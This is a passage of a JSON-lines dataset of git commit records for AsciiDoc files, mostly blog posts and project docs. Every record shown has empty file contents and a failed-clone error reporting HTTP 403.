<db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"dkrot\/odp,nmorey\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,erachmi\/odp,nmorey\/odp,dkrot\/odp,dkrot\/odp,ravineet-singh\/odp,nmorey\/odp,mike-holmes-linaro\/odp,erachmi\/odp,mike-holmes-linaro\/odp,ravineet-singh\/odp,erachmi\/odp,nmorey\/odp,mike-holmes-linaro\/odp,erachmi\/odp,ravineet-singh\/odp,dkrot\/odp","old_file":"doc\/glossary.adoc","new_file":"doc\/glossary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"ddaeadca88a42d159fef835fb3597825437b0661","subject":"Update 2016-06-10-Ditirambo-contado-por-sus-cantantes-I-I.adoc","message":"Update 2016-06-10-Ditirambo-contado-por-sus-cantantes-I-I.adoc","repos":"ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es","old_file":"_posts\/2016-06-10-Ditirambo-contado-por-sus-cantantes-I-I.adoc","new_file":"_posts\/2016-06-10-Ditirambo-contado-por-sus-cantantes-I-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ditirambo\/ditirambo.es.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"c79e5ae821c450ff8bebb82590f98cb598b64d0b","subject":"Add 2nd Chapter and 2 Sections","message":"Add 2nd Chapter and 2 Sections\n","repos":"mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion","old_file":"docs\/lob_guide\/src\/asciidoc\/_chapters\/work_with_lob.adoc","new_file":"docs\/lob_guide\/src\/asciidoc\/_chapters\/work_with_lob.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mashengchen\/incubator-trafodion.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4cbd1bf14c86eab943613a35f00b936220754727","subject":"Update 2016-08-09-TP.adoc","message":"Update 2016-08-09-TP.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-09-TP.adoc","new_file":"_posts\/2016-08-09-TP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"402ff11a8b1d827660e1deaaa63b9dccba1d857e","subject":"Developer docs for modules and packages (#531)","message":"Developer docs for modules and packages (#531)\n\nCo-authored-by: David Smiley <ff0b55894fb4e3b5483d0e086b4d08bed4d08380@apache.org>\r\nCo-authored-by: Eric Pugh <15dca3954de5ad1a330286360fd33b30a2572191@opensourceconnections.com>\r\nCo-authored-by: Houston Putman <aeb660d59a4b7c00bbc36a6341efe038d538789c@gmail.com>","repos":"apache\/solr,apache\/solr,apache\/solr,apache\/solr,apache\/solr","old_file":"dev-docs\/plugins-modules-packages.adoc","new_file":"dev-docs\/plugins-modules-packages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/solr.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ffa9a5e61e99f874e1b5ddc414e44f4e7f5edba3","subject":"Update 2015-11-05-Hello.adoc","message":"Update 2015-11-05-Hello.adoc","repos":"the-101\/the-101.github.io,the-101\/the-101.github.io,the-101\/the-101.github.io","old_file":"_posts\/2015-11-05-Hello.adoc","new_file":"_posts\/2015-11-05-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/the-101\/the-101.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1df8c850e534d8b42f0fe749f08f383c0e5cd4a9","subject":"Update 2016-05-06-Draft.adoc","message":"Update 2016-05-06-Draft.adoc","repos":"fadlee\/fadlee.github.io,fadlee\/fadlee.github.io,fadlee\/fadlee.github.io,fadlee\/fadlee.github.io","old_file":"_posts\/2016-05-06-Draft.adoc","new_file":"_posts\/2016-05-06-Draft.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fadlee\/fadlee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3fb21c1b3d92592a39a7679e84b5d1661e27ff88","subject":"Update 2015-12-28-AirHacX-Tracking-Unit.adoc","message":"Update 
2015-12-28-AirHacX-Tracking-Unit.adoc","repos":"AirHacX\/blog.airhacx.com,AirHacX\/blog.airhacx.com,AirHacX\/blog.airhacx.com","old_file":"_posts\/2015-12-28-AirHacX-Tracking-Unit.adoc","new_file":"_posts\/2015-12-28-AirHacX-Tracking-Unit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AirHacX\/blog.airhacx.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48418d4f782d722288c58e9c0d2df12b6d33bc5a","subject":"Update 2016-03-29-Ingenieria-social-S-E.adoc","message":"Update 2016-03-29-Ingenieria-social-S-E.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Ingenieria-social-S-E.adoc","new_file":"_posts\/2016-03-29-Ingenieria-social-S-E.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e72dcb011afcb9dca54a4f421628198fa8e61753","subject":"Added a README file to the logging directory.","message":"Added a README file to the logging directory.\n\nThis file contains some information about the modules below this\ndirectory and why they are needed.\n","repos":"oheger\/LineDJ","old_file":"logging\/README.adoc","new_file":"logging\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oheger\/LineDJ.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"04e1063c6f0a3fb82f2284d84d4a03c76481a3f1","subject":"Update 2017-07-28-Friday-July-28th-2017.adoc","message":"Update 2017-07-28-Friday-July-28th-2017.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-07-28-Friday-July-28th-2017.adoc","new_file":"_posts\/2017-07-28-Friday-July-28th-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"746a45863238ded7eba9c971d6684a3f7aa20d54","subject":"Moved the readme into the project","message":"Moved the readme into the project\n\nconverted to asciidoc\n","repos":"resilience4j\/resilience4j,mehtabsinghmann\/resilience4j,drmaas\/resilience4j,goldobin\/resilience4j,javaslang\/javaslang-circuitbreaker,drmaas\/resilience4j,RobWin\/javaslang-circuitbreaker,resilience4j\/resilience4j,RobWin\/circuitbreaker-java8","old_file":"resilience4j-retrofit\/README.adoc","new_file":"resilience4j-retrofit\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5c8eb45747a3a2279e3eff2397b69aa08c09bc73","subject":"add requirements page","message":"add requirements 
page\n","repos":"jasontedor\/elasticsearch-hadoop,holdenk\/elasticsearch-hadoop,pranavraman\/elasticsearch-hadoop,Gavin-Yang\/elasticsearch-hadoop,cgvarela\/elasticsearch-hadoop,girirajsharma\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,yonglehou\/elasticsearch-hadoop,puneetjaiswal\/elasticsearch-hadoop,lgscofield\/elasticsearch-hadoop,huangll\/elasticsearch-hadoop,samkohli\/elasticsearch-hadoop,sarwarbhuiyan\/elasticsearch-hadoop,trifork\/elasticsearch-hadoop,kai5263499\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,nfouka\/elasticsearch-hadoop,aie108\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/intro.adoc","new_file":"docs\/src\/reference\/asciidoc\/intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pranavraman\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f6c7affbb02d475e29b35f8147c8282de7979d71","subject":"Removed section on Swig since we're not using it anymore","message":"Removed section on Swig since we're not using it anymore","repos":"EMCWorld\/2015-REST,EMCWorld\/2015-REST,EMCWorld\/2015-REST,EMCWorld\/2015-REST","old_file":"lab\/intro.adoc","new_file":"lab\/intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMCWorld\/2015-REST.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"879d5559de651f4014b35ffcca8658001b9f8ca2","subject":"Fix location of HTML file","message":"Fix location of HTML file","repos":"EMCWorld\/2015-REST,EMCWorld\/2015-REST,EMCWorld\/2015-REST,EMCWorld\/2015-REST","old_file":"lab\/login.adoc","new_file":"lab\/login.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMCWorld\/2015-REST.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b2e1b1181f90504bb6f125cfeef82c1cb4e33ac4","subject":"Update 2015-09-20-Python-re-module.adoc","message":"Update 2015-09-20-Python-re-module.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-20-Python-re-module.adoc","new_file":"_posts\/2015-09-20-Python-re-module.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc26eb50be70f39ef1e99a5624219e70f6939b48","subject":"Update 2015-06-15-NodeJSs-event-loop.adoc","message":"Update 2015-06-15-NodeJSs-event-loop.adoc","repos":"ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io","old_file":"_posts\/2015-06-15-NodeJSs-event-loop.adoc","new_file":"_posts\/2015-06-15-NodeJSs-event-loop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ragingsmurf\/ragingsmurf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"edb99127518bd4e11fc46e9bb6b2d690fc407f52","subject":"Update 2015-06-18-Teilen-ist-wichtig.adoc","message":"Update 
2015-06-18-Teilen-ist-wichtig.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-06-18-Teilen-ist-wichtig.adoc","new_file":"_posts\/2015-06-18-Teilen-ist-wichtig.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60b5d38c60b2c7ec21081e5bf3081c9c0f5a77bd","subject":"JDK install","message":"JDK install\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Various.adoc","new_file":"Best practices\/Various.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e8c76def7554cc62c548c10ce6b040a1b1d81049","subject":"chore(Ch4): add index","message":"chore(Ch4): add index\n","repos":"genie88\/promises-book,purepennons\/promises-book,tangjinzhou\/promises-book,azu\/promises-book,wenber\/promises-book,liyunsheng\/promises-book,xifeiwu\/promises-book,cqricky\/promises-book,wangwei1237\/promises-book,dieface\/promises-book,charlenopires\/promises-book,tangjinzhou\/promises-book,mzbac\/promises-book,azu\/promises-book,oToUC\/promises-book,mzbac\/promises-book,liubin\/promises-book,cqricky\/promises-book,xifeiwu\/promises-book,charlenopires\/promises-book,xifeiwu\/promises-book,oToUC\/promises-book,tangjinzhou\/promises-book,wangwei1237\/promises-book,dieface\/promises-book,sunfurong\/promise,cqricky\/promises-book,purepennons\/promises-book,mzbac\/promises-book,oToUC\/promises-book,purepennons\/promises-book,genie88\/promises-book,liubin\/promises-book,wangwei1237\/promises-book,sunfurong\/promise,liyunsheng\/promises-book,lidasong2014\/promises-book,lidasong2014\/promises-book,genie88\/promises-book,wenber\/promises-book,charlenopires\/promises-book,liyunsheng\/promises-book,dieface\/promises-book,sunfurong\/promise,wenber\/promises-book,liubin\/promises-book,azu\/promises-book,azu\/promises-book,lidasong2014\/promises-book","old_file":"Ch4_AdvancedPromises\/readme.adoc","new_file":"Ch4_AdvancedPromises\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xifeiwu\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"656fb6aecf8452f5e43617df377b764461d4fe5c","subject":"blog: added persistence and distributed computing","message":"blog: added persistence and distributed computing\n","repos":"gAmUssA\/hazelcast-mongo-experiments","old_file":"Hazelcast For MongoDB users.adoc","new_file":"Hazelcast For MongoDB users.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gAmUssA\/hazelcast-mongo-experiments.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20d9254852b3259ab0d4390409fdceaa6dbb6e0b","subject":"Update 2013-12-26-Episode-3-Total-Chaos.adoc","message":"Update 
2013-12-26-Episode-3-Total-Chaos.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2013-12-26-Episode-3-Total-Chaos.adoc","new_file":"_posts\/2013-12-26-Episode-3-Total-Chaos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b356ddc7ea9fc01783daaf18f826e9b6d84d40a","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e458a1e0f9da9ef3c4a0cc49817b6a4b6f744ef","subject":"Update 2015-10-25-Middleman.adoc","message":"Update 2015-10-25-Middleman.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Middleman.adoc","new_file":"_posts\/2015-10-25-Middleman.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f82667324740246502f463230bdf28300b55627","subject":"Update 2018-09-10-Firestore.adoc","message":"Update 2018-09-10-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-10-Firestore.adoc","new_file":"_posts\/2018-09-10-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ae0a96e46301dbecc6217de887647df61a4a805","subject":"Update 2019-04-22-Cloud-Run.adoc","message":"Update 2019-04-22-Cloud-Run.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-04-22-Cloud-Run.adoc","new_file":"_posts\/2019-04-22-Cloud-Run.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc9bc8857b534f8a05cb249d35a33ab92d3058d9","subject":"Update 2015-03-01-Notes-from-Mathiass-Unicode-talk.adoc","message":"Update 2015-03-01-Notes-from-Mathiass-Unicode-talk.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-03-01-Notes-from-Mathiass-Unicode-talk.adoc","new_file":"_posts\/2015-03-01-Notes-from-Mathiass-Unicode-talk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66b2162e9516ec36699e62d9edde5543c37a82eb","subject":"Delete 2016-5-13-Engineer-Career-Path.adoc","message":"Delete 2016-5-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-5-13-Engineer-Career-Path.adoc","new_file":"2016-5-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d033ad0fe9df8b5a88b85b0f30421fdc8c6af2b2","subject":"Update 2015-05-18-uGUI.adoc","message":"Update 2015-05-18-uGUI.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-18-uGUI.adoc","new_file":"_posts\/2015-05-18-uGUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d55c3a2034d8f0eb8a5b48dabd4e9fecbdfaa0f7","subject":"Update 2016-05-16-test.adoc","message":"Update 2016-05-16-test.adoc","repos":"sgalles\/sgalles.github.io,sgalles\/sgalles.github.io,sgalles\/sgalles.github.io,sgalles\/sgalles.github.io","old_file":"_posts\/2016-05-16-test.adoc","new_file":"_posts\/2016-05-16-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sgalles\/sgalles.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"15d99e2958d697ec19a4f09c32ef7478174841fe","subject":"Update 2016-06-24-Kitchen-Sink.adoc","message":"Update 2016-06-24-Kitchen-Sink.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e58ec161e340cd0edc5c854714311d0a77646d6","subject":"Update 2015-02-24-Second-Post.adoc","message":"Update 2015-02-24-Second-Post.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-Second-Post.adoc","new_file":"_posts\/2015-02-24-Second-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2fd839a1359e1e1253dd9398be5f14783f15ddc","subject":"Update 2015-02-28-A-Code-post.adoc","message":"Update 2015-02-28-A-Code-post.adoc","repos":"pdudits\/hubpress,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/hubpress,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/hubpress,pdudits\/hubpress","old_file":"_posts\/2015-02-28-A-Code-post.adoc","new_file":"_posts\/2015-02-28-A-Code-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 
access 'https:\/\/github.com\/pdudits\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db2a049fffb7961da4e9e0b93f5aef07d4102a34","subject":"Update 2016-10-11-Hello-World.adoc","message":"Update 2016-10-11-Hello-World.adoc","repos":"pallewela\/pallewela.github.io,pallewela\/pallewela.github.io,pallewela\/pallewela.github.io,pallewela\/pallewela.github.io","old_file":"_posts\/2016-10-11-Hello-World.adoc","new_file":"_posts\/2016-10-11-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pallewela\/pallewela.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cdfd8bb650a466211a37e2cfcfceabf236ef883a","subject":"Update 2018-11-08-A-W-S-Azure.adoc","message":"Update 2018-11-08-A-W-S-Azure.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"094618a410148b7d6794ec752f26e5a423dc8eaf","subject":"Update 2016-07-24-Virtual-Box-via-linha-de-comando-o-basico.adoc","message":"Update 2016-07-24-Virtual-Box-via-linha-de-comando-o-basico.adoc","repos":"cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io","old_file":"_posts\/2016-07-24-Virtual-Box-via-linha-de-comando-o-basico.adoc","new_file":"_posts\/2016-07-24-Virtual-Box-via-linha-de-comando-o-basico.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee76f27ea611d59fddd9d8c6813a1e6ec8a1b372","subject":"y2b create post The World's First Portable Theater!","message":"y2b create post The World's First Portable Theater!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-28-The-Worlds-First-Portable-Theater.adoc","new_file":"_posts\/2016-08-28-The-Worlds-First-Portable-Theater.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2033959e5d24539da42bab557d94830343130df","subject":"Update 2019-01-10-Research-An-Artisanal-Perspective.adoc","message":"Update 2019-01-10-Research-An-Artisanal-Perspective.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2019-01-10-Research-An-Artisanal-Perspective.adoc","new_file":"_posts\/2019-01-10-Research-An-Artisanal-Perspective.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2880b4f8c52cc853710e8a3f52c1aa8baf2d8eae","subject":"Update 
2015-11-22-Devlet-Sirri.adoc","message":"Update 2015-11-22-Devlet-Sirri.adoc","repos":"mhmtbsbyndr\/mhmtbsbyndr.github.io,mhmtbsbyndr\/mhmtbsbyndr.github.io,mhmtbsbyndr\/mhmtbsbyndr.github.io","old_file":"_posts\/2015-11-22-Devlet-Sirri.adoc","new_file":"_posts\/2015-11-22-Devlet-Sirri.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mhmtbsbyndr\/mhmtbsbyndr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6fae8bb59f3b7ad537f93a65b6d45bbd37791388","subject":"y2b create post iPhone Jenga","message":"y2b create post iPhone Jenga","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-01-26-iPhone-Jenga.adoc","new_file":"_posts\/2017-01-26-iPhone-Jenga.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f8c5fe91ec9819140d24ea1fd100e091e93937b","subject":"Update 2015-04-23-iOS-interview-part-2.adoc","message":"Update 2015-04-23-iOS-interview-part-2.adoc","repos":"J0HDev\/blog,J0HDev\/blog,J0HDev\/blog","old_file":"_posts\/2015-04-23-iOS-interview-part-2.adoc","new_file":"_posts\/2015-04-23-iOS-interview-part-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/J0HDev\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"020553fea05d2f75423cd4df101e82952c324d72","subject":"Update 2015-05-03-Auszeichnugssprachen.adoc","message":"Update 2015-05-03-Auszeichnugssprachen.adoc","repos":"fundstuecke\/fundstuecke.github.io,fundstuecke\/fundstuecke.github.io,fundstuecke\/fundstuecke.github.io","old_file":"_posts\/2015-05-03-Auszeichnugssprachen.adoc","new_file":"_posts\/2015-05-03-Auszeichnugssprachen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fundstuecke\/fundstuecke.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f87599c70d1c76c47887660faedd3c32053cef5f","subject":"Update 2015-05-16-Faustino-loeza-Perez.adoc","message":"Update 2015-05-16-Faustino-loeza-Perez.adoc","repos":"faustinoloeza\/blog,faustinoloeza\/blog,faustinoloeza\/blog","old_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faustinoloeza\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6178726ad8e46f0ca414378e72c15803f6eb910a","subject":"Update 2017-02-26-Trying-out-Hub-Press.adoc","message":"Update 2017-02-26-Trying-out-Hub-Press.adoc","repos":"amodig\/amodig.github.io,amodig\/amodig.github.io,amodig\/amodig.github.io,amodig\/amodig.github.io","old_file":"_posts\/2017-02-26-Trying-out-Hub-Press.adoc","new_file":"_posts\/2017-02-26-Trying-out-Hub-Press.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/amodig\/amodig.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"42c0d92b8e6b2d66dcb6924b328a2a663ca5abb0","subject":"Update 
